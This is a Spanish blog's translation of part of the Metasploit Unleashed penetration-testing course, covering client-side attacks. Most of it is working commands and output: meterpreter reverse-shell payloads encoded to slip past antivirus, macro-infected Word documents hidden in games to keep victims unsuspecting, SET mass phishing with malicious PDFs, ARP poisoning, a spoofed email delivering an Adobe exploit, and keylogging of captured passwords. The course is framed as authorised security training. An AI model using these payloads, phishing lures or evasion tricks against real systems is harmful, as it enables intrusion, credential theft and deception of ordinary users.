Mostrando las entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Metasploit. Mostrar todas las entradas

Metasploit Unleashed en Espanol

19.3.10



Curso de Metasploit Unleashed en Español. 

El siguiente curso es gratuito y puede verlo desde este enlace en ingles, http://www.offensive-security.com/metasploit-unleashed/. No se ha modificado el contenido del curso, la traducción sigue manteniendo el contenido del mismo. Este curso es propiedad de Offensive Security 2009, solo me limito a la traducción.

28/10/2009 - METASPLOIT UNLEASHED - MASTERING THE FRAMEWORK

28/10/2009 - 1 Introducción 

29/10/2009 - 2 Materiales requeridos para el curso
29/10/2009 - 2.1 Requisitos de Hardware
29/10/2009 - 2.2 Ubuntu 7.04
30/10/2009 - 2.3 Windows XP SP2
01/11/2009 - 2.3.1 Archivos Requeridos
01/11/2009 - 2.3.2 Configurando VMware
01/11/2009 - 2.3.3 Post-Instalacion XP SP2
01/11/2009 - 2.3.4 Servicios Adicionales
02/11/2009 - 2.3.5 Crear una Aplicación Web Vulnerable 

02/11/2009 - 3 Interactuando con MSF
04/11/2009 - 3.1 msfconsole
05/11/2009 - 3.2 msfcli

07/11/2009 - 4 Obteniendo Información
07/11/2009 - 4.1 El Framework Dradis
07/11/2009 - 4.2 Escaneo de Puertos
07/11/2009 - 4.3 Plugins Auxiliares
07/11/2009 - 4.4 Buscando MSSQL
07/11/2009 - 4.5 Identificación de Servicios
26/11/2009 - 4.6 Password Sniffing 
26/11/2009 - 4.6.1 Ampliando Psnuffle
19/12/2009 - 4.7 SNMP Sweeping

08/01/2010 - 5 Analisis de Vulnerabilidades
08/01/2010 - 5.1 Verificacion de Login SMB
08/01/2010 - 5.2 Autentificacion VNC
08/01/2010 - 5.3 X11 a la escucha
08/01/2010 - 5.4 Escaner Web WMAP
08/01/2010 - 5.5 Trabajando con Nessus

11/02/2010 - 6 Escribiendo un Simple Fuzzer
11/02/2010 - 6.1 Un simple Fuzzer de TFTP
11/02/2010 - 6.2 Un simple Fuzzer de IMAP

11/02/2010 - 7 Desarrollo de un Exploit
15/02/2010 - 7.1 Escribiendo un Exploit
15/02/2010 - 7.1.1 Obteniendo un shell
15/02/2010 - 7.2 Usando Egghunter Mixin
20/02/2010 - 7.2.1 Completando el Exploit
11/02/2010 - 7.3 Codigo Shell Alfanumerico

11/02/2010 - 8 Client-Side Exploits
04/03/2010 - 8.1 Binarios de un Payload
07/03/2010 - 8.2 Antivirus Bypass
04/03/2010 - 8.3 Binario de Trojanos en Linux
16/03/2010 - 8.4 Infeccion con el Applet de Java
16/03/2010 - 8.5 Ataques Client Side
19/03/2010 - 8.6 Kit de Herramientas de Ingenieria Social
19/03/2010 - 8.7 Metodos de Infeccion con VBScript

xx/03/2010 - 14 Construyendo un Modulo
xx/03/2010 - 14.1 Payloads a traves MSSQL
xx/03/2010 - 14.2 Creando un Modulo Auxiliar
xx/03/2010 - 14.3 El Funcionamiento Detras de Esto.

16/03/2010 - 15 Dona Aqui

20/02/2010 - 16 Glosario
20/02/2010 - 16.1 Modulos
20/02/2010 - 16.2 Recursos
07/03/2010 - 16.3 Un Poco sobre Payloads

15/02/2010 - 17 FAQ 

15/02/2010 - 18 Sobre los Autores 
04/10/2010 - 18.1 David Kennedy
04/10/2010 - 18.2 Carlos Perez
04/10/2010 - 18.3 Jim O'Gorman
04/10/2010 - 18.4 David Ovitz
04/10/2010 - 18.5 Devon Kearns
04/10/2010 - 18.6 William Coppola
04/10/2010 - 18.7 Max Moser
04/10/2010 - 18.8 Mati Aharoni
04/10/2010 - 18.9 Matteo Memelli


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.7/18)

Metodos de Infeccion con VBScript

Metasploit tiene un par de metodos ya construidos que puedes utilizar para infectar documentos de World y Excel con payloads de Metasploit. Ademas puedes usar tus propios payload personlizados. No es necesario que sea un payload de Metasploit. Este metodo es util despues de un ataque client-side y tambien puede ser util si se tiene que evitar algun tipo de filtro que no permita archivos ejecutables y solo permita pasar documentos.

Primero lo primero, vamos a crear nuestro VBScript y establecer a Metasploit para la escucha.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 280
Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai
root@bt4:/pentest/exploits/framework3# mv payload.exe tools/
root@bt4:/pentest/exploits/framework3# cd tools/
root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 14510 bytes of EXE into a VBA script
root@bt4:/pentest/exploits/framework3/tools# cd..
root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler
[*] Please wait while we load the module tree...
exploit/multi/handler Generic Payload Handler
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Para recapitular todo lo que hemos visto hasta ahora, hemos creado nuestro payload usando el codificador polimorfico shikata_ga_nai, convertido en un ejecutable, conectandose de nuevo a nosotros en el puerto 8080 en el host 10.211.55.162. Luego convertimos el ejecutable a VBScript usando el script "exe2vba.rb" en la seccion de herramientas. Una vez que se ha completado, tendra que obtener una maquina con Windows que tenga Word instalado para realizar los siguientes pasos:

En Word o Excel 2003, ve a Herramientas, Macros, Editor de Visual Basic, si estas usando Word/Excel 2007, ir a Ver Macros, luego coloca un nombre como "moo" y seleccione "crear".

Esto abrira el editor de visual basic. Pegue el resultado del archivo payload.vbs en el editor, guardalo y escriba cualquier cosa en el documento en si. Esto es cuando se realiza un ataque client-side enviando por correo electronico este documento de Word a alquien.

A fin de mantener la sospecha del usuario baja, trate de introducir el codigo en los muchos juegos de Word/Excel que estan disponibles por internet. De esa manera, el usuario esta feliz jugando mientras que estas trabajando en el fondo. Esto le da mas tiempo extra para migrar a otro proceso si estas usando Meterpreter como payload.

Photobucket

Aqui le damos un nombre generico al macro.

Photobucket

Primero, prueba el documento abriendolo, y revisa donde tienes el multi/handler de Metasploit a la escucha:

root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696)

meterpreter > execute -f cmd.exe -i
Process 2152 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\rel1k>


Exito! Tenemos el shell de Meterpreter directo al sistema que abrio el documento, y lo mejor de todo, el anti-virus no se da cuenta!!!

Hay varios metodos para hacer esto, tambien puedes usar:

root@bt4:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe

Esto pasara la salida del payload a un script vbs asiq ue los pasos son los mismos mencionados arriba. Algo que mencionar es que los macros estan desabilitados por defecto tanto para la version home como coporate, asi que tendrias persuadir para habilitar los macros o tener la esperanza que lo hayan habilitado para ver el documento de forma correcta. Aqui es donde tener un script incrustado en un documento con un juego en Flash incrustado viene muy bien.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.6/18)

Kit de Herramientas de Ingenieria Social

El Kit de Herramientas de Ingenieria Social (Social-Engineering Toolkit, SET) fue disenado por David Kennedy (ReL1K) e incorpora muchos ataques de Ingenieria-Social todo en una simple interfaz. El proposito principal de KIS es automatizar y mejorar muchos de los ataques de ingenieria social que existen. Como pentesters, la ingenieria social es a menudo una practica que no muchas personas realizan. Puedes descargar el Kit de Herramietas de Ingenieria Social a traves de subversion simplemente escribiendo en Back|Track 4:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

La belleza con la version actual de SET es que no requiere ningun modulo extra de python, asi que todo lo que necesitas hacer es ejecutarlo:

root@bt4:/home/relik# cd SET/
root@ssdavebt4:/home/relik/SET# ./set


[---] The Social Engineering Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.1 Alpha [---]

Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit

Enter your choice:


Tenga en cuenta que esta es una version alfa de SET y esta disenado para ser lanzado con el lanzamiento del Framework de Ingenieria Social (http://www.social-engineer.org). Si notas, el formato general de SET es muy similar al menu interactivo de Fast-Track. Esto fue intencional ya que probablemente se convertira eventualmente en un modulo de Fast-Track.

Escenario 1

Tienes como objetivo una organizacion y haz utilizado herramientas de codigo abierto, Google, y otros, y hemos sido capaces de extraer 30 direccion de e-mail. Quieres enviar muchos correos a estos individuos con la esperanza que abran el archivo adjunto y finalmente te den acceso al sistema.

Lo primero que necesitas es crear una lista con las direcciones de correo electronico con el formato de abajo:

bob@example.com
joe@example.com
jane@example.com
josh@example.com


Una vez que tenemos la lista generada, carga SET, crea un payload para que se conecte de regreso a ti, y preparate para conseguir algunas shells.

root@bt4:/home/relik/SET# ./set


[---] The Social Engineering Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.1 Alpha [---]

Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit

Enter your choice: 1


[---] The Social Engineering Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.1 Alpha [---]
[---] E-Mail Attacks Menu [---]

This menu will automate file-format email attacks for you. You will
first have to create your own payload, you can easily do this by using
the "Create a FileFormat Payload", then from there launch the mass
e-mail attack.

1. Perform a Mass Email Attack
2. Create a Social-Engineering Payload
3. Return to Main Menu.

Enter your choice: 1
Do you want to create a social-engineering payload now yes or no: yes

Select the file format exploit you want.

The default is the PDF embedded EXE.


***** METASPLOIT PAYLOADS *****


1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR)


Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse Shell
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)

Enter the payload you want: 1
Enter the IP address you want the payload to connect back to you on: 10.211.55.130
Enter the port you want to connect back on: 4444
Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in 'src/msf_attacks/form.pdf'...
[*] Parseing 'src/msf_attacks/form.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/shell_reverse_tcp' as payload...
[*] Creating 'template.pdf' file...
[*] Generated output file /home/relik/SET/src/program_junk/template.pdf


Payload creation complete. All payloads get sent to the src/msf_attacks/template.pdf directory

Press enter to return to the prior menu.


As an added bonus, use the file-format creator in SET to create your attachment.


[-] A previous created PDF attack by SET was detected..Do you want to use the PDF as a payload? [-]


Enter your answer yes or no: yes

Social Engineering Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 2

Which template do you want to use?

1. Strange and Suspicious Computer Behavior
2. Email to SysAdmins, can't open PDF
3. Please Open up this Status Report
4. Enter your own message

Enter your choice: 3

The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:

john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com

This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt

Enter the path to the file to import into SET: email.txt
Enter your GMAIL email address: relik@gmail.com
Enter your password for gmail (it will not be displayed back to you):
Sent e-mail number: 1
Sent e-mail number: 2
Sent e-mail number: 3
Sent e-mail number: 4


SET has finished deliverying the emails. Do you want to setup a listener yes or no: yes
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Ahora que los correos electronicos se han enviado y estamos a la escucha. Esperamos que del otro extremo se haga el trabajo y hagan clic en nuestro PDF.

Photobucket

Ahora el usuario abre el PDF, y se le presenta un PDF de forma correcta. Vease abajo:

Photobucket

En el sistema que tenemos a la escucha en Back|Track 4 vemos esto:

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (10.211.55.130:4444 -> 10.211.55.140:1079)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Otra opcion para explotacion otra que no sea por e-mail es creando una pagina web falsa que tenga un Payload de Metasploit y una vez que se visita, mostramos un Applet de Java "firmado" por Microsoft Corporation y si ellos aceptan, nuestro payload se cargara. Otro ejemplo que podemos usar, si estamos dentro de una red es con un envenenamiento automatico del cache ARP donde podemos tener SET para envenenar la subred de la victima y reemplazar todos los HREF's de la victima con nuestras paginas. Usaremos este ejemplo en el escenario de abajo sin embargo, envenenamiento del cache ARP es una opcion, yo recomendaria combinar cross-site scripting y un buen e-mail elaborado o una llamada telefonica con el fin de conseguir que vaya a su sitio.

root@bt4:/home/relik/SET# ./set


[---] The Social Engineering Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.1 Alpha [---]

Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs.

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Help
5. Exit the Toolkit

Enter your choice: 2

The Social Engineering Toolkit "Web Attack" will create a
fake "professional" looking website for you with malicious
java applet code. When you entice a victim to the website
either through social-engineering, a XSS vulnerability,
E-Mail, or other options, it will prompt the user to say
"Yes" to run the applet signed by Microsoft. Once accepted
a payload will be run on the remote system and executed.

The payload itself will be generated dynamically through
Metasploit and the handler and everything be setup for you
automatically through the SEF Web Attack toolkit.

Do you wish to continue? y/n: y
What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.

Enter choice (example 1-4): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 4444
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 274
Options: LHOST=10.211.55.130,LPORT=4444,ENCODING=shikata_ga_nai
Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCONSOLE on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'

Listening on IP: 10.211.55.130 on Local Port: 4444 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************

Would you like to use ettercap to ARP poison a host yes or no: yes

Ettercap allows you to ARP poison a specific host and when they browse
a site, force them to use oursite and launch a slew of
exploits from the Metasploit repository. ETTERCAP REQUIRED.


What IP Address do you want to poison: 10.211.55.140
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'src/program_junk/ettercap.filter' done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to 'src/program_junk/ettercap.ef' done.

-> Script encoded into 16 instructions.

Filter compiled...Running Ettercap and poisoning target...


***************************************************
Web Server Launched. Welcome to the SEF Web Attack.
***************************************************


[--] Tested on IE6, IE7, IE8 and FireFox [--]


Type -c to exit..


Echemos una ojeada al navegador de la victima:

Photobucket

Fijese en la parte inferior izquierda que la URL ha sido sustituido por nuestro sitio web. Ahora la victima realiza una busqueda normal en Google. Veamos que pasa:

Photobucket

Tenga en cuenta que la advertencia de seguridad nos pide confiar en una aplicacion firmada por Microsoft Corporation. Despues que el usuario acepta y ejecuta la aplicacion, se nos regresan algunas cosas:

[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.140:1129)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -i
Process 2596 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Para ver el video en linea de este ataque, revisa la pagina de vimeo de David Kennydy's aqui.

SET todavia esta en progreso y nuevos ataques seran liberados junto con la herramienta. SET utiliza multiples vectores de ataques para hacer que su expericiencia en ingenieria social sea un poco mas facil.


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (15/18)

16.3.10

Dona a HFC, alimenta a un niño!
Todos los ingresos van directamente a HFCs programa de trabajo de alimencion para Kenia.


Dona Aqui


Haga clic aqui para aprender mas sobre los donantes.



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.5/18)

Ataques Client Side

Como ya se ha discutido, Metasploit tiene muchos usos y ahora vamos a duscutir otro aqui, es ataques client side. Para mostrar el poder de como puede ser usado MSF en ataques client side usaremos una historia.

En el mundo de la seguridad, la ingenieria social se ha convertido en un ataque cada vez mas usado. A pesar de que la tecnologias estan cambiando, una cosa que se mantiene igual es la falta de seguridad con las personas. Debido a esto, la ingenieria social se ha convertido en un tema muy "caliente" en el mundo de la seguridad hoy en dia.

En nuestro primer escenario nuestro atacante ha estado recolectando mucha informacion usando una herramienta como Metasploit Framework, Maltego y otras herramientas para conseguir direcciones de correos electronicos e informacion para poder lanzar un ataque de client side con ingenieria social en la victima.

Despues de la inmersion con exito por internet en busca de correos electronicos, ha ganado dos piezas clave de informacion.

1) Utilizan "Best Computers" para servicio tecnico.

2) El departamento IT tiene una direccion de correo electronico itdept@victim.com

Queremos ganar acceso shell del computador del Departamento IT y ejecutar un keylogger para capturar un password, o cualquier otra informacion de importante.

Comenzamos por cargar el msfconsole.

Luego de cargar, creamos un PDF malicioso que le dara a la victima una cierta confianza al abrirlo. Para hacer esto, debe parecer legitimo, tener un titulo que sea realista, y que no sea marcado por los anti-virus o alguna otra alerta de seguridad.

Vamos a usar el Adobe Reader "util.printf()" JavaScript Function Stack Buffer Overflow Vulnerability.

Adobe Reader es propenso a una vulnerabilidad de desboradmiento de buffer basado en la pila debido que la aplicacion no realiza una revision de los limites adecuados de los datos proporcionados por el usuario.

Un atacante puede explotar este problema ejecutando codigo arbitrario con los privilegios del usuario ejecutando la aplicacion o cerrar la aplicacion, denegando el servicio a los usuarios legitimos.

Asi que empezamos por crear nuestro archivo PDF malicioso para usar en este ataque de client side.

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME BestComputers-UpgradeInstructions.pdf yes The file name.
OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.8.128 yes The local address
LPORT 4455 yes The local port


Exploit target:

Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)


Una vez que tengamos todas las opciones definidas en el modo que queramos, ejecutamos "exploit" para crear el archivo.

msf exploit(adobe_utilprintf) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >


Asi podemos ver que el archivo PDF fue creado en un sub-directorio en donde estamos. Vamos a copiarlo en el directorio /tmp para que sea facil de localizar mas tarde.

Antes de enviar el archivo malicioso a nuestra victima, necesitamos configurar algo que escuche para capturar la conexion inversa. Vamos a usar msfconsole para configurar el multi handler.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Ahora que estamos a la escucha esperando en recibir el payload malicioso, tenemos que entregar este payload a la victima y como en la recopilacion de informacion obtuvimos la direccion de correo electronico del departamento IT, usaremos un pequeño y util script llamado sendEmail para enviar el payload a la victima. Con el kung-fu de una-linea, podemos adjuntar el archivo pdf, usamos cualquier servidor smtp que queramos y escribimos un email convincente desde cualquier direccion...

root@bt4:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Best Computers Tech Support
Aug 24 17:32:51 bt4 sendEmail[13144]: Message input complete.
Aug 24 17:32:51 bt4 sendEmail[13144]: Email was sent successfully!


Como podemos ver aqui, el script nos permite poner cualquier direccion FROM (-f) , cualquier direccion TO (-t), cualquier servidor SMTP (-s) como tambien un Titulo (-u) y el archivo adjunto (-a). Una vez que hacemos todo esto y precionamos enter podemos escribir cualquier mensaje que queramos, luego precionamos CTRL+D y esto enviara el correo electronico a la victima.

Ahora en la maquina de la victima, los empleados del Departamento IT lo conseguiran durante el dia cuando inicien seccion en el computador para revisar sus correos.

El ve el muy importante documento y lo copia hacia su escritorio como lo hace siempre, y lo escanea con su programa anti-virus favorito.

Photobucket

Como podemos ver, paso sin ser detectado por lo que nuestro administrador IT esta dispuesto en abrir este archivo para implementar rapidamente estas importantes actualizaciones. Al hacer click el archivo abre Adobe pero muestra una ventana gris que no revela nunca un PDF. En cambio, en el equipo atacante se revela...

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)

meterpreter >


Ahora tenemos una shell de su computador a traves de un ataque de client side con un PDF malicioso. Por supuesto, seria conveniente a este punto mover la shell a otro proceso diferente, porque cuando se finalize Adobe no perdamos la shell. Luego obtenemos informacion del sistema, ejecutamos un keylogger y continuamos explotando la red.

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
852 taskeng.exe C:\Windows\system32\taskeng.exe
1308 Dwm.exe C:\Windows\system32\Dwm.exe
1520 explorer.exe C:\Windows\explorer.exe
2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe
3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > migrate 1520
[*] Migrating to 1520...
[*] Migration completed successfully.

meterpreter > sysinfo
Computer: OFFSEC-PC
OS : Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

Support, I tried to open ti his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to p open. I turned on the rmote access server so you can log in to fix our p this problem. Our user name is admin and password for that session is 123456. Call or eme ail when you are done. Thanks IT Dept
meterpreter >


GAME OVER


© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (8.4/18)

Infeccion con el Applet de Java

Joshua Abraham (jabra) publico un gran articulo que se basa en una charla que se dio en el Infosec World Conference con Rafal Los y se puede encontrar en http://blog.spl0it.org. Esencialmente, los dos fueron capaces de construir un applet de java que una vez ejecutado en un navegador nos permitira ejecutar un payload con Meterpreter si el objetivo acepta la advertencia de seguridad.

Antes de sumergirnos en esto, tenemos que cumplir con algunos requisitos en nuestras maquinas atacantes antes de empezar.

root@bt4:/# apt-get install sun-java6-jdk

Jabra ha simplificado la mayor parte del proceso con el script en bash para reducir errores de entrada. Puedes descargar este script desde: http://spl0it.org/files/makeapplet.sh

#!/bin/bash
#
# Shell script to sign a Java Applet
# Joshua "Jabra" Abraham <jabra@spl0it.org>
# Tue Jun 30 02:26:36 EDT 2009
#
# 1. Compile the Applet source code to an executable class.
#
# javac HelloWorld.java
#
# 2. Package the compiled class into a JAR file.
#
# jar cvf HelloWorld.jar HelloWorld.class
#
# 3. Generate key pairs.
#
# keytool genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
#
# 4. Sign the JAR file.
#
# jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass - signedjar SignedHelloWorld.jar
# HelloWorld.jar signapplet
#
# 5. Export the public key certificate.
#
# keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
#
# 6. Deploy the JAR and the class file.
#
# <applet code="HelloWorld.class" archive="SignedHelloWorld.jar" width=1 height=1> </applet>
#
echo "Enter the name of the applet without the extension:"
read NAMEjavac $NAME.javaif [ $? -eq 1 ] ; then
echo "Error with javac"
exit
fi

echo "[+] Packaging the compiled class into a JAR file"
jar cf $NAME.jar $NAME.class
if [ $? -eq 1 ] ; then
echo "Error with jar"
exit
fi

echo "[+] Generating key pairs"
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
if [ $? -eq 1 ] ; then
echo "Error with generating the key pair"
exit
fi

echo "[+] Signing the JAR file"
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar "Signed$NAME.jar" $NAME.jar signapplet
if [ $? -eq 1 ] ; then
echo "Error with signing the jar"
exit
fi

echo "[+] Exporting the public key certificate"
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
if [ $? -eq 1 ] ; then
echo "Error with exporting the public key"
exit
fi
echo "[+] Done"
sleep 1
echo ""
echo ""
echo "Deploy the JAR and certificate files. They should be deployed to a directory on a Web server."
echo ""
echo "<applet width='1' height='1' code='$NAME.class' archive='Signed$NAME.jar'> "
echo ""

Ahora vamos hacer un directorio de trabajo para almacenar este archivo y luego agarrar desde su sitio o copiar y pegar en tu editor de texto favorito.

root@bt4:/# mkdir ./java-applet

root@bt4:/# cd ./java-applet


Tenemos que hacer un applet de Java que luego firmaremos. Para esto, copiamos y pegamos el texto de abajo en tu editor de texto favorito y lo salvamos como: "MSFcmd.java". Para lo que queda de este modulo, deja el editor abierto, ya que tendras que modificar algunos parametros a medida que avancemos por el modulo.

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}


A continuacion, usaremos el shell script de Jabras para ayudarnos en hacer nuestro certificado. EL siguiente comando descargara el script, hazlo ejecutable, y luego ejecuta el script para producir el certificado.

root@bt4:/java-applet/# wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh

root@bt4:/java-applet/# ./makeapplet.sh

Enter the name of the applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
